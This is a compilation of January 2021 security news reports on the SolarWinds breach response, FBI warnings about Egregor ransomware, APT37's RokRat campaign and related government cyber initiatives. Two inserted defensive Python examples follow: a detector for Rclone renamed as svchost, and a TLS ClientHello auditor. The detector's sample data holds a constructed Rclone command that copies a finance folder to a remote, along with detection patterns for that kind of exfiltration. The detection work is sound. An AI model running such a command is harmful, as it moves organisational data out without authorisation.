Stamos, meanwhile, is the former Facebook CISO, and the founder of the Stanford Internet Observatory. Stamos over the past year has been tapped by other companies hit by various security scandals – including Zoom, after a COVID-19 surge in its user base led to Zoom-bombing cyberattacks and privacy concerns.
First reported by The Financial Times on Thursday, the two paired up to launch a cybersecurity consulting business, called the Krebs Stamos Group. According to the company’s website, the consulting team works with companies to help them understand the various security risks that they face, as well as their weaknesses, “and the role they play in the security of our wider society.” Threatpost has reached out to the Krebs Stamos Group for further comment.
“Our concept is simple: help businesses manage cybersecurity risk as business risk, making the internet a safer place in the meantime,” said Krebs on Twitter on Friday.
Security experts, for their part, praised SolarWinds’ decision to tap the new firm, with security researcher Kevin Beaumont saying on Twitter: “This is a really smart hire.”
The need for security expertise moving forward is essential for SolarWinds as the company continues to face fallout from the hack. Just this week, the Department of Justice (DoJ) announced that cybercriminals breached its Office 365 email server as part of the massive hack.
In December, it was discovered that an attack vector leveraging the default password (“SolarWinds123”) of the SolarWinds platform gave attackers an open door into its software-updating mechanism. Combining that with SolarWinds’ deep visibility into customer networks became a “perfect storm” contributing to the widespread success of the attack, researchers have said. The U.S. government has identified Russia as the “likely” culprit behind the attack.
On Twitter on Friday, Stamos said: “We have already engaged in helping understand and recover from what looks to be one of the most serious foreign intrusion campaigns in history, and we will be helping others learn from this attack.”
SolarWinds CEO Sudhakar Ramakrishna (former CEO of Pulse Secure), who was brought on board before the company was notified of the cyberattack, said the company is engaging with industry colleagues, third-party security experts and intelligence agencies worldwide, as part of the investigation.
“We have engaged several leading cybersecurity experts to assist us in this journey and I commit to being transparent with our customers, our government partners, and the general public in both the near-term and long-term about our security enhancements to ensure we maintain what’s most important to us – your trust,” Ramakrishna said on Thursday.
FBI Warns of Egregor Attacks on Businesses Worldwide
9.1.2021 BigBrothers Threatpost
The agency said the malware has already compromised more than 150 organizations and provided insight into its ransomware-as-a-service behavior.
The FBI has alerted companies in the private sector to a spate of attacks using the Egregor ransomware. The malware is currently on a warpath across businesses worldwide and has already compromised more than 150 organizations.
The agency issued an advisory (PDF) that also sheds new light on the inner workings of the prolific malware, which has already been seen wreaking indiscriminate havoc on various types of organizations. Bookseller Barnes & Noble, retailer Kmart, gaming software provider Ubisoft and the Vancouver metro system TransLink are all known victims of the ransomware.
Egregor, the name of which refers to an occult term signifying the collective energy or force of a group of individuals, is indeed the work of a “large number of actors” and is operating under a ransomware-as-a-service model, according to the FBI.
“Because of the large number of actors involved in deploying Egregor, the tactics, techniques and procedures (TTPs) used in its deployment can vary widely, creating significant challenges for defense and mitigation,” the FBI said.
The FBI noted the “number of ways” Egregor compromises business networks, “including targeting…employee personal accounts that share access with business networks or devices.” It also spreads via phishing emails with malicious attachments, or exploits for remote desktop protocol (RDP) or VPNs, the agency said.
Once access is gained, threat actors can move laterally inside networks. Egregor ransomware affiliates have been observed using common pen-testing and exploit tools like Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner and AdFind to escalate privileges and make lateral moves across a network, as well as tools like Rclone — sometimes renamed or hidden as “svchost” — and 7zip to exfiltrate data, according to the FBI.
Corroborating what security researchers already have observed, the FBI said it first identified Egregor in September and said that since then, the threat actors behind the malware have worked quickly.
The document also describes what the typical modus operandi of Egregor looks like to victims, behavior also already observed in known and publicized attacks. In addition to engaging in typical ransomware behaviors, such as exfiltrating and encrypting files on the network as well as leaving a ransom note on machines to instruct victims how to communicate with threat actors via an online chat, Egregor also has a unique feature, the FBI noted.
“Egregor actors often utilize the print function on victim machines to print ransom notes,” the agency wrote in the document. Indeed, Egregor is at this time the only known ransomware to run scripts that cause printers at the organization to continuously print out the ransom note, a behavior captured on video and posted to Twitter during an attack on South American retailer Cencosud in mid-November.
If victims refuse to pay, Egregor publishes victim data to a “public site,” the FBI noted. However, the agency, like many security experts, encourages organizations not to pay the ransom, as it “emboldens adversaries to target additional organizations, encourages other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities,” the agency said.
Paying the ransom also does not guarantee that a victim’s files will be recovered, another well-known outcome of ransomware attacks, the FBI said.
“However, the FBI understands that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees and customers,” the agency said, encouraging organizations to report ransomware incidents to their local FBI field offices whether they decide to pay the ransom or not.
Welcome Bureau of Cyberspace Security and Emerging Technologies (CSET)
9.1.2021 BigBrothers Securityaffairs
United States Department of State approved the creation of the Bureau of Cyberspace Security and Emerging Technologies (CSET).
The United States Secretary of State Mike Pompeo approved the creation of the Bureau of Cyberspace Security and Emerging Technologies (CSET) that was first announced in 2019.
The CSET Bureau was created to increase the resilience of the country to foreign cyber-threats and lead the emerging cybersecurity diplomacy efforts.
“Secretary Pompeo has approved the creation of the Bureau of Cyberspace Security and Emerging Technologies (CSET) and has directed the Department to move forward with standing up the bureau.” reads the official announcement published by the US Department of State. “The need to reorganize and resource America’s cyberspace and emerging technology security diplomacy through the creation of CSET is critical, as the challenges to U.S. national security presented by China, Russia, Iran, North Korea, and other cyber and emerging technology competitors and adversaries have only increased since the Department notified Congress in June 2019 of its intent to create CSET.”
The US Department of State recognizes China, Russia, Iran, and North Korea as adversaries that could threaten national security.
Their operations have significantly increased in the last couple of years.
CSET will be tasked to secure cyberspace and protect critical technologies, and reduce the likelihood of cyber conflict.
“The CSET bureau will lead U.S. government diplomatic efforts on a wide range of international cyberspace security and emerging technology policy issues that affect U.S. foreign policy and national security, including securing cyberspace and critical technologies, reducing the likelihood of cyber conflict, and prevailing in strategic cyber competition.” concludes the announcement. “The Secretary’s decision to establish CSET will permit the Department to posture itself appropriately and engage as effectively as possible with partners and allies on these pressing national security concerns.”
SolarWinds Taps Firm Started by Ex-CISA Chief Chris Krebs, Former Facebook CSO Alex Stamos
9.1.2021 BigBrothers Securityweek
SolarWinds Hires New Cybersecurity Firm Founded by Former CISA Director Chris Krebs and Alex Stamos, Former Security Chief at Yahoo and Facebook
Following a significant security incident that sent shockwaves through the global cybersecurity community, SolarWinds has hired a newly formed cybersecurity consulting firm founded by Chris Krebs, former director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Alex Stamos, former security chief at Facebook and Yahoo.
Generically named the Krebs Stamos Group (KSG), its website currently shows limited information about the firm, saying its goal is to “help organizations turn their greatest cybersecurity challenges into triumphs.”
The consulting firm will apparently help customers assess their security posture, provide them with advice on “critical, long-lasting decisions,” and help them create cybersecurity teams, processes, programs and culture.
SolarWinds confirmed on Thursday that it has hired the company launched by Krebs and Stamos.
“We have brought in the expertise of Chris Krebs and Alex Stamos to assist in this review and provide best-in-class guidance on our journey to evolve into an industry leading secure software development company,” SolarWinds said in a statement to the media.
SecurityWeek has reached out to KSG for additional information about the company and its work for SolarWinds, but the company has yet to respond.
Krebs was fired from CISA in November by U.S. President Donald Trump after he refuted claims of electoral fraud and vouched for the integrity of the recent presidential election. After leaving Facebook in August 2018, Stamos became director of the Internet Observatory at Stanford University.
In the meantime, the U.S. government and cybersecurity companies continue to investigate the SolarWinds breach. According to some media reports, investigators are looking into the potential role played in the attack by a product from JetBrains, a software development firm based in the Czech Republic.
JetBrains said it was not aware of any investigation, but did not rule out that its TeamCity software was somehow exploited by hackers, either due to a misconfiguration or a vulnerability.
The United States this week officially said Russia was likely behind the attack on SolarWinds, an accusation that the Kremlin has denied. There is also some evidence that a second, unrelated threat actor may have also targeted SolarWinds.
While SolarWinds said that 18,000 customers may have used a compromised version of its Orion product, the fallout is believed to have resulted in at least 250 private sector and government organizations being breached. The list of government victims includes the U.S. Justice Department, which admitted this week that hackers may have accessed some Microsoft 365 email accounts, but claimed there was no evidence that classified systems were compromised.
U.S. Department of State Approves New Cyberspace Security Bureau
9.1.2021 BigBrothers Securityweek
United States Secretary of State Mike Pompeo this week approved the creation of the Bureau of Cyberspace Security and Emerging Technologies (CSET).
Initially announced in 2019, the CSET Bureau should help the U.S. and its allies better handle expanding foreign cyber-threats. It is also meant as a step toward organizing America’s cyberspace and emerging technology security diplomacy.
China, Russia, Iran, and North Korea are considered by the United States threats to its national security, along with “other cyber and emerging technology competitors and adversaries,” the Department of State points out.
In fact, the agency also notes that challenges posed by these adversaries have increased significantly since the intent to create CSET was announced in June 2019.
Some of the international cyberspace security and emerging technology policy issues CSET will be in charge of include “securing cyberspace and critical technologies, reducing the likelihood of cyber conflict, and prevailing in strategic cyber competition,” the Department of State says.
Now that the secretary of state has decided to establish CSET, the agency can move forth and engage with its partners and allies to address national security concerns.
In September 2020, the U.S. Government Accountability Office (GAO) issued a report underlining that the Department of State did not involve relevant federal agencies in its effort to establish the CSET Bureau, especially since these agencies too are involved in cyber-security.
In its response to GAO’s findings (also included in the report), the Department of State argued that these agencies did not consult it when reorganizing their cybersecurity capabilities. However, the State Department said it did consult with congressional oversight committees.
FBI Warns Businesses of Egregor Ransomware Attacks
9.1.2021 BigBrothers Securityweek
Offered under a Ransomware-as-a-Service (RaaS) business model, the Egregor ransomware poses a great threat to businesses due to the use of double extortion, a recent private industry notification from the Federal Bureau of Investigation warns.
Initially observed by the FBI in September 2020, Egregor has claimed more than 150 victims to date, all around the world. Following network compromise, Egregor’s operators don’t just encrypt victims’ files, but also exfiltrate data, threatening to publish it online unless a ransom is paid.
The ransom note it drops on the compromised machines instructs victims to contact the operators via online chat. The threat actors demand a ransom to be paid in exchange for the exfiltrated information and a tool to recover encrypted files.
Egregor, the FBI says, is deployed by multiple individuals, meaning that tactics, techniques, and procedures (TTPs) used in attacks are varied and that defending against these attacks is challenging.
The ransomware’s operators were observed targeting business networks as well as employee personal accounts. Phishing emails carrying malicious attachments may be used, but Egregor would also exploit Remote Desktop Protocol (RDP) or Virtual Private Networks (VPNs) for initial access.
Furthermore, the threat actors behind Egregor may also leverage its RDP exploitation capability to move laterally inside the compromised networks.
Following initial access, pen testing and exploit tools are employed for privilege escalation and lateral movement. Some of these include Advanced IP Scanner, AdFind, Cobalt Strike, and Qakbot/Qbot. Utilities such as Rclone and 7zip are abused for data exfiltration.
Ransomware victims should not pay the ransom, as this encourages adversaries to target additional organizations and may attract more wannabe criminals to ransomware distribution, the FBI says.
“Paying the ransom also does not guarantee that a victim’s files will be recovered. However, the FBI understands that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers,” the industry notification reads.
Ransomware victims are encouraged to report the incidents, so that the FBI can gather data to prevent further attacks.
To mitigate ransomware attacks, organizations should keep data back-ups offline or in the cloud, secure these back-ups, use up-to-date security tools, ensure only secure networks are in use, enable two-factor authentication, prioritize patching, and review suspicious files and activity.
Probe Launched Into Impact of SolarWinds Breach on Federal Courts
9.1.2021 BigBrothers Securityweek
An investigation has been launched into the impact of the SolarWinds breach on the computer systems used by federal courts in the United States, which reportedly represented a target of interest to the hackers.
The Administrative Office (AO) of the U.S. Courts said an investigation was launched in mid-December after the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive instructing all federal agencies to immediately analyze their systems for evidence indicating that they may have been targeted through the Orion monitoring tool developed by SolarWinds.
The judiciary ordered all local and national courts to stop using the Orion software, but it may have been too late as the attackers could have already accessed highly sensitive information, including sealed documents.
A majority of the documents in the federal court system are available to the public, either for free or a small fee, but sealed filings often contain sensitive information that should not be made public.
“The AO is working with the Department of Homeland Security on a security audit relating to vulnerabilities in the Judiciary’s Case Management/Electronic Case Files system (CM/ECF) that greatly risk compromising highly sensitive non-public documents stored on CM/ECF, particularly sealed filings. An apparent compromise of the confidentiality of the CM/ECF system due to these discovered vulnerabilities currently is under investigation. Due to the nature of the attacks, the review of this matter and its impact is ongoing,” the public was told on Wednesday.
The judiciary announced that it has started rolling out additional safeguards to protect sensitive court records — highly sensitive court documents will only be accepted by federal courts on paper or via an electronic device such as a thumb drive, and they will be stored on a secure stand-alone computer rather than the CM/ECF system.
Investigative journalist Brian Krebs said he learned from sources that federal courts were actually “hit hard” by the SolarWinds breach, with the attackers delivering a piece of malware named Teardrop to its systems.
The threat group behind the SolarWinds supply chain attack, which the U.S. government believes is backed by Russia, leveraged trojanized updates for the Orion software to deliver a piece of malware named Sunburst to the Texas-based company’s customers. While the Sunburst malware has been delivered to thousands of organizations, the Teardrop malware was likely only sent by the attackers to a few hundred victims that were considered important targets.
The potential impact of the SolarWinds hack on federal courts was announced on the same day the U.S. Justice Department announced that it too was hit and the attackers may have accessed some Microsoft 365 email accounts. The DoJ claimed there was no evidence that classified systems were compromised.
ALERT: North Korean hackers targeting South Korea with RokRat Trojan
9.1.2021 BigBrothers Thehackernews
A North Korean hacking group has been found deploying the RokRat Trojan in a new spear-phishing campaign targeting the South Korean government.
Attributing the attack to APT37 (aka ScarCruft, Ricochet Chollima, or Reaper), Malwarebytes said it identified a malicious document last December that, when opened, executes a macro in memory to install the aforementioned remote access tool (RAT).
"The file contains an embedded macro that uses a VBA self decoding technique to decode itself within the memory spaces of Microsoft Office without writing to the disk. It then embeds a variant of the RokRat into Notepad," the researchers noted in a Wednesday analysis.
Believed to be active at least since 2012, the Reaper APT is known for its focus on public and private entities primarily in South Korea, such as chemicals, electronics, manufacturing, aerospace, automotive, and healthcare entities. Since then, their victimology has expanded beyond the Korean peninsula to include Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.
While the previous attacks leveraged malware-laced Hangul Word Processor (HWP) documents, the use of self-decoding VBA Office files to deliver RokRat suggests a change in tactics for APT37, the researchers said.
The Microsoft VBA document uploaded to VirusTotal in December purported to be a meeting request dated January 23, 2020, implying that attacks took place almost a year ago.
Chief among the responsibilities of the macro embedded in the file is to inject shellcode to a Notepad.exe process that downloads the RokRat payload in encrypted format from a Google Drive URL.
RokRat — first publicly documented by Cisco Talos in 2017 — is a RAT of choice for APT37, with the group using it for a number of campaigns since 2016. A Windows-based backdoor distributed via trojanized documents, it's capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Box, Dropbox, and Yandex.
In 2019, the cloud service-based RAT gained additional features to steal Bluetooth device information as part of an intelligence-gathering effort directed against investment and trading companies in Vietnam and Russia and a diplomatic agency in Hong Kong.
"The case we analyzed is one of the few where they did not use HWP files as their phish documents and instead used Microsoft Office documents weaponized with a self decode macro," the researchers concluded. "That technique is a clever choice that can bypass several static detection mechanisms and hide the main intent of a malicious document."
Biden to Appoint Cybersecurity Advisor to NSC – Report
8.1.2021 BigBrothers Threatpost
Anne Neuberger will join the National Security Council, according to sources.
President-elect Joe Biden has reportedly tapped the National Security Agency’s cybersecurity director to serve in a brand-new cyber-role on his National Security Council.
Anne Neuberger, a more than 10-year veteran of the NSA and its cyber-chief since 2019, will become the country’s deputy national security adviser for cybersecurity, according to Politico.
The move would elevate cybersecurity to a top-level priority for the U.S. government. The NSC is the President’s principal forum for considering national security and foreign policy matters with senior national security advisors and cabinet officials.
Sources told Politico that Neuberger will thus be in charge of coordinating cybersecurity across the federal government’s agencies and departments. One of her very likely first tasks will be dealing with the sprawling SolarWinds cyberattack, carried out by nation-state hackers believed to be backed by Russia. The extent of the massive campaign is still being explored, and cybersecurity officials inside the Trump Administration have already said that the remediation process will be complex, difficult and extremely costly.
Neuberger became the NSA’s first director of cybersecurity and deputy national manager in 2019, after serving as the NSA’s chief risk officer for five years. She is in charge of sharing threat intelligence between the NSA and public and private entities, especially regarding threats to critical infrastructure. NSA’s role in U.S. cybersecurity includes serving as the Office of the National Manager (ONM) for systems that handle classified information or are otherwise critical to military or intelligence activities.
Giving cybersecurity a seat at the NSC table dovetails with the incoming Biden administration’s stated interest in beefing up the U.S.’ cybersecurity posture.
“The Biden-Harris Administration will make cybersecurity a top priority, elevating it as an imperative across the government from day one,” a transition media spokesperson for the Biden transition told the outlet. “We will strengthen our partnerships with the private sector, academia and civil society; renew our commitment to international norms and engagement on cyber-issues; and expand our investment in the infrastructure and people we need to effectively defend the nation against malicious cyber-activity.”
FBI alert warns private organizations of Egregor ransomware attacks
8.1.2021 BigBrothers Securityaffairs
The US Federal Bureau of Investigation (FBI) issued a security alert warning private sector companies of Egregor ransomware attacks.
The US FBI has issued a Private Industry Notification (PIN) to warn private organizations of Egregor ransomware attacks.
The Egregor ransomware first appeared on the threat landscape in September 2020; since then, the gang has claimed to have compromised over 150 organizations.
The list of known victims includes Barnes and Noble, Cencosud, Crytek, Kmart, Ubisoft, and Metro Vancouver’s transportation agency TransLink.
Egregor is known to target the printers of compromised organizations, instructing them to print the ransom note.
The Egregor gang often exfiltrates files from the target network, and if the victim refuses to pay, the operators publish the victim's data on a leak site.
“The FBI assesses Egregor ransomware is operating as a Ransomware as a Service Model. In this model, multiple different individuals play a part in conducting a single intrusion and ransomware event. Because of the large number of actors involved in deploying Egregor, the tactics, techniques, and procedures (TTPs) used in its deployment can vary widely, creating significant challenges for defense and mitigation.” reads the alert. “Egregor ransomware utilizes multiple mechanisms to compromise business networks, including targeting business network and employee personal accounts that share access with business networks or devices.”
Threat actors use phishing emails with malicious attachments as an attack vector; they also exploit insecure Remote Desktop Protocol (RDP) or Virtual Private Network (VPN) services to gain access to networks.
Once they have gained access to the target network, the threat actors attempt to escalate privileges and move laterally using Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner, and AdFind.
The FBI also added that the ransomware operators leverage tools like Rclone (sometimes renamed or hidden as svchost) and 7zip for data exfiltration.
The FBI discourages victims from paying the ransom and urges them to report incidents to local FBI field offices.
“The FBI does not encourage paying a ransom to criminal actors. Paying a ransom emboldens adversaries to target additional organizations, encourages other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities.” concludes the alert. “Paying the ransom also does not guarantee that a victim’s files will be recovered.”
Below is the list of mitigations provided by the FBI to defend against Egregor’s attacks:
Recommended Mitigations:
Back-up critical data offline.
Ensure copies of critical data are in the cloud or on an external hard drive or storage device.
Secure your back-ups and ensure data is not accessible for modification or deletion from the system where the data resides.
Install and regularly update anti-virus or anti-malware software on all hosts.
Only use secure networks and avoid using public Wi-Fi networks.
Use two-factor authentication and do not click on unsolicited attachments or links in emails.
Prioritize patching of public-facing remote access products and applications, including recent RDP vulnerabilities (CVE-2020-0609, CVE-2020-0610, CVE-2020-16896, CVE-2019-1489, CVE-2019-1225, CVE-2019-1224, CVE-2019-1108).
Review suspicious .bat and .dll files, files with recon data (such as .log files), and exfiltration tools.
Securely configure RDP by restricting access, using multi-factor authentication or strong passwords.
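The notification's observation that Rclone is sometimes renamed to svchost, together with the mitigation to review exfiltration tools, translates into a simple host-side check. The following is an added example, not code from the FBI notification: it audits a process inventory for svchost.exe instances that do not look like the real Windows service host. The inventory records are constructed for the example, and the field names (pid, name, path, parent, signer, cmdline) and the "Microsoft Windows" signer string are assumptions about what an EDR or Sysmon export would provide.

```python
"""Flag processes named svchost.exe that do not behave like the Windows service host.

Added example (not from the FBI notification). A genuine svchost.exe is started by
services.exe from a Windows system directory and is Microsoft-signed; a renamed
Rclone binary typically violates all of these and carries rclone's own
"<verb> <source> <remote>:<path>" command-line shape.
"""
from __future__ import annotations

import re
from pathlib import PureWindowsPath

# Directories a legitimate svchost.exe is loaded from (lower-cased for comparison).
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# rclone transfer verbs and the "remote:path" argument they take. A Windows drive
# letter such as C:\ is excluded because a remote name is at least two characters
# and is never followed by a backslash.
RCLONE_VERB = re.compile(r"(?<!\S)(copy|copyto|sync|move|moveto)(?!\S)")
RCLONE_REMOTE = re.compile(r"(?<!\S)[A-Za-z0-9_-]{2,}:(?:[^\\\s]\S*)?(?!\S)")


def audit_process(proc: dict) -> list[str]:
    """Return a list of findings for one process record; empty means nothing suspicious."""
    if proc["name"].lower() != "svchost.exe":
        return []
    findings = []
    parent_dir = str(PureWindowsPath(proc["path"]).parent).lower()
    if parent_dir not in SYSTEM_DIRS:
        findings.append(f"svchost.exe running from {proc['path']}")
    if proc.get("parent", "").lower() != "services.exe":
        findings.append(f"parent is {proc.get('parent') or 'unknown'}, not services.exe")
    # Assumption: the telemetry exposes the Authenticode signer name in "signer".
    if "microsoft" not in proc.get("signer", "").lower():
        findings.append("binary not signed by Microsoft")
    cmd = proc.get("cmdline", "")
    if RCLONE_VERB.search(cmd) and RCLONE_REMOTE.search(cmd):
        findings.append("command line matches rclone transfer syntax")
    return findings


def audit_inventory(procs: list[dict]) -> dict[int, list[str]]:
    """Map pid -> findings for every process that produced at least one finding."""
    return {p["pid"]: f for p in procs if (f := audit_process(p))}


# Constructed sample inventory, not real telemetry.
SAMPLE_INVENTORY = [
    {"pid": 812, "name": "svchost.exe", "path": r"C:\Windows\System32\svchost.exe",
     "parent": "services.exe", "signer": "Microsoft Windows",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"pid": 2204, "name": "svchost.exe", "path": r"C:\Windows\SysWOW64\svchost.exe",
     "parent": "services.exe", "signer": "Microsoft Windows",
     "cmdline": "svchost.exe -k wsappx -p"},
    {"pid": 4410, "name": "svchost.exe", "path": r"C:\Users\Public\svchost.exe",
     "parent": "cmd.exe", "signer": "",
     "cmdline": r"svchost.exe copy C:\Finance remote:backup --config C:\Users\Public\rc.conf"},
    {"pid": 5120, "name": "notepad.exe", "path": r"C:\Windows\System32\notepad.exe",
     "parent": "explorer.exe", "signer": "Microsoft Windows", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for pid, findings in audit_inventory(SAMPLE_INVENTORY).items():
        print(pid, findings)
```

Each check is independent, so a renamed tool that happens to be dropped into System32 is still caught by the parent, signer and command-line checks; conversely a single finding (for example a non-standard parent during a service restart) is a lead to triage, not a verdict.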
US Govt kicked off ‘Hack the Army 3.0’ bug bounty program
8.1.2021 BigBrothers Securityaffairs
The U.S. government is going to launch the ‘Hack the Army 3.0’ bug bounty program in collaboration with the HackerOne platform.
The U.S. government launched Hack the Army 3.0, the third edition of its bug bounty program, in collaboration with the HackerOne platform.
The second Hack the Army bug bounty program ran between October 9 and November 15, 2019 through the HackerOne platform. The bug bounty program operated by the Defense Digital Service, along with the U.S. Department of Defense (DoD) paid more than $275,000 in rewards and a total of 146 valid vulnerabilities were reported.
The previous edition of the bug bounty program saw the participation of 52 white hat hackers. The US Army asked participants to test more than 60 publicly accessible web assets, including *.army.mil, *.goarmy.mil, and the Arlington Cemetery website.
Now the US government has announced Hack the Army 3.0, which takes place between January 6 and February 17.
“Bug bounty programs are a unique and effective ‘force multiplier’ for safeguarding critical Army networks, systems and data, and build on the efforts of our Army and DoD security professionals,” said Brig. Gen. Adam C. Volant, U.S. Army Cyber Command Director of Operations. “By ‘crowdsourcing’ solutions with the help of the world’s best military and civilian ethical hackers, we complement our existing security measures and provide an additional means to identify and fix vulnerabilities. Hack the Army 3.0 builds upon the successes and lessons of our prior bug bounty programs.”
“We are proud of our continued partnership with the Army to challenge the status quo in strengthening the security of military systems and shifting government culture by engaging ethical hackers to address vulnerabilities” says Brett Goldstein, Director, Defense Digital Service. “We’re calling on civilian and military hackers to show us what they’ve got in this bug bounty and to help train the future force.”
The initiative continues to be operated by the Defense Digital Service (DDS) that will invite a selected number of military and civilian white hat hackers.
According to the program policy, only civilian participants are eligible for bug bounties.
“We are living in a different world today than even just a year ago,” said Marten Mickos, CEO of HackerOne. “Amidst disinformation and a global health crisis, citizens are increasingly wary of how, when, and where their information is used. For years, the U.S. Department of Defense and respective military branches have successfully strengthened their cybersecurity posture and protected precious data by enlisting the help of ethical hackers on HackerOne. Years later, hacker-powered security is not only a best practice in the US military, but it is now a mandated requirement among civilian federal agencies. There is only one way to secure our connected society, together, and the U.S. Army is leading the charge with this latest challenge.”
NSA Issues Guidance on Replacing Obsolete TLS Versions
8.1.2021 BigBrothers Securityweek
The National Security Agency (NSA) this week issued guidance for National Security System (NSS), Department of Defense (DoD), and Defense Industrial Base (DIB) cybersecurity decision makers, system admins, and network security analysts to replace obsolete versions of the Transport Layer Security (TLS) protocol.
TLS and Secure Sockets Layer (SSL) were designed to ensure the security and privacy of communication channels between clients and servers through encryption and authentication.
The protocols encrypt data in transit, but older versions of these protocols have proven insecure, weakening data protection. Furthermore, new attacks against them have been discovered, further demonstrating their inadequacy.
While older versions of the security protocols, namely SSL, TLS 1.0, and TLS 1.1, have been deprecated in many existing online services and applications, there still are systems that rely on these insecure protocols, thus exposing entire networks.
“NSA recommends that only TLS 1.2 or TLS 1.3 be used; and that SSL 2.0, SSL 3.0, TLS 1.0, and TLS1.1 not be used,” the agency says.
In the newly released guidance, the NSA provides details on how network administrators and security analysts can identify and eliminate obsolete TLS configurations in their environments, including protocol versions, cipher suites, and key exchange methods.
“This will also help organizations prepare for cryptographic agility to always stay ahead of malicious actors’ abilities and protect important information. Using obsolete encryption provides a false sense of security because it may look as though sensitive data is protected, even though it really is not,” the NSA notes.
The first step, the agency notes, is to detect obsolete TLS configurations still in use in US government systems by identifying clients and servers using older TLS versions and devices using obsolete cipher suites and/or weak key exchange methods.
As remediation steps, admins should configure monitoring devices to alert and/or block weak TLS traffic. However, a phased approach to detecting and fixing clients is recommended, to minimize impact.
“By using the guidance, government network owners can make informed decisions to enhance their cybersecurity posture. Since these risks affect all networks, all network owners and operators should consider taking these actions to reduce their risk exposure and make their systems harder targets for malicious threat actors,” the NSA notes.
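The detection step described above (identifying clients that still offer older TLS versions or obsolete cipher suites) can be done passively from the first packet of a handshake. The following is an added example and not code from the NSA guidance: it parses the record and handshake framing of a TLS ClientHello, reads the legacy version field and, when present, the supported_versions extension (which replaces the legacy field for TLS 1.3 clients), and reports any obsolete version or RC4/3DES/NULL cipher suite offered. The two ClientHello messages are constructed inline for the example; they are not captured traffic.

```python
"""Audit a TLS ClientHello for obsolete protocol versions and weak cipher suites.

Added example, not part of the NSA guidance. Follows the ClientHello layout of
RFC 5246 (TLS 1.2) and the supported_versions extension of RFC 8446 (TLS 1.3).
"""
from __future__ import annotations

import struct

OBSOLETE_VERSIONS = {(3, 0): "SSL 3.0", (3, 1): "TLS 1.0", (3, 2): "TLS 1.1"}
# IANA cipher suite ids for suites that should never be offered (NULL, RC4, 3DES).
WEAK_SUITES = {
    0x0000: "TLS_NULL_WITH_NULL_NULL",
    0x0004: "TLS_RSA_WITH_RC4_128_MD5",
    0x0005: "TLS_RSA_WITH_RC4_128_SHA",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
}
SUPPORTED_VERSIONS_EXT = 0x002B


def parse_client_hello(record: bytes) -> dict:
    """Return the versions and cipher suites offered in one ClientHello record."""
    if len(record) < 9 or record[0] != 0x16:          # content type: handshake
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if hs[0] != 0x01:                                   # handshake type: ClientHello
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 0
    legacy_version = (body[pos], body[pos + 1]); pos += 2
    pos += 32                                           # client random
    pos += 1 + body[pos]                                # session id
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]; pos += 2
    suites = [struct.unpack("!H", body[pos + i:pos + i + 2])[0] for i in range(0, cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                                # compression methods
    versions = [legacy_version]
    if pos + 2 <= len(body):                            # optional extensions block
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]; pos += 2
        while pos + 4 <= end:
            ext_type, ext_len = struct.unpack("!HH", body[pos:pos + 4]); pos += 4
            data = body[pos:pos + ext_len]; pos += ext_len
            if ext_type == SUPPORTED_VERSIONS_EXT and data:
                # RFC 8446 4.2.1: this list, not legacy_version, is what the client offers.
                versions = [(data[i], data[i + 1]) for i in range(1, 1 + data[0], 2)]
    return {"versions": versions, "cipher_suites": suites}


def audit_client_hello(record: bytes) -> list[str]:
    """Findings for a ClientHello; an empty list means nothing obsolete was offered."""
    info = parse_client_hello(record)
    findings = [f"obsolete protocol offered: {OBSOLETE_VERSIONS[v]}"
                for v in info["versions"] if v in OBSOLETE_VERSIONS]
    findings += [f"weak cipher suite offered: {WEAK_SUITES[s]}"
                 for s in info["cipher_suites"] if s in WEAK_SUITES]
    return findings


def build_client_hello(legacy_version, suites, supported_versions=None) -> bytes:
    """Build a minimal ClientHello; used only to construct sample input for the example."""
    body = bytes(legacy_version) + b"\x00" * 32 + b"\x00"      # version, random, empty session id
    body += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                          # one compression method: null
    if supported_versions:
        vers = b"".join(bytes(v) for v in supported_versions)
        ext = struct.pack("!HH", SUPPORTED_VERSIONS_EXT, 1 + len(vers)) + bytes([len(vers)]) + vers
        body += struct.pack("!H", len(ext)) + ext
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs


# Constructed samples: a TLS 1.0 client offering RC4 and 3DES, and a TLS 1.3 client.
LEGACY_HELLO = build_client_hello((3, 1), [0x0005, 0x000A, 0x002F])
MODERN_HELLO = build_client_hello((3, 3), [0x1301, 0xC02F], supported_versions=[(3, 4), (3, 3)])

if __name__ == "__main__":
    for name, hello in (("legacy", LEGACY_HELLO), ("modern", MODERN_HELLO)):
        print(name, audit_client_hello(hello) or ["clean"])
```

Running the same parser over the ServerHello (handshake type 0x02) tells you what the server actually negotiated, which is the stronger signal for the "configure monitoring devices to alert and/or block" step: a client merely offering TLS 1.0 is a remediation lead, while a server accepting it is the finding.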
Investigation Launched Into Role of JetBrains Product in SolarWinds Hack: Reports
8.1.2021 BigBrothers Securityweek
Cybersecurity companies and U.S. intelligence agencies are investigating the possible role played by a product from JetBrains in the recently discovered SolarWinds hack, according to reports.
The New York Times and Reuters reported on Wednesday that cybersecurity experts and government agencies are trying to determine whether the hackers that targeted SolarWinds may have abused software created by JetBrains to achieve their goal.
